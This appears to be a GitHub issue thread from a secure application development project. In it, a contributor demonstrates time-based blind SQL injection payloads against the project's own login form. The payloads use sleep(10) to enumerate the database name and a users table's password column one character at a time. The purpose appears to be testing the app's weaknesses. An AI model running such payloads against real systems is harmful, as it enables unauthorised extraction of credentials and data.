AlexDarigan
commented
3 months ago Most notably, we can do this with passwords too (assuming we know the user table name)
admin' AND (select sleep(10) from sapusers where user_pwd like 'p%');--
Closed AlexDarigan closed 2 months ago
AlexDarigan
commented
3 months ago Most notably, we can do this with passwords too (assuming we know the user table name)
admin' AND (select sleep(10) from sapusers where user_pwd like 'p%');--
On login, this query (NOTE: There is a necessary whitespace after -- otherwise the line won't be commented out properly).
admin' AND (select sleep(10) from dual where database() like 'se%');--
(with any password)
means
Sleep for 10 seconds where any database begins with 'se' (and this will trigger because our db is secureappdevs), users could use a loop over a combination of characters, and anytime a character returns a slowdown, we will know it is correct character.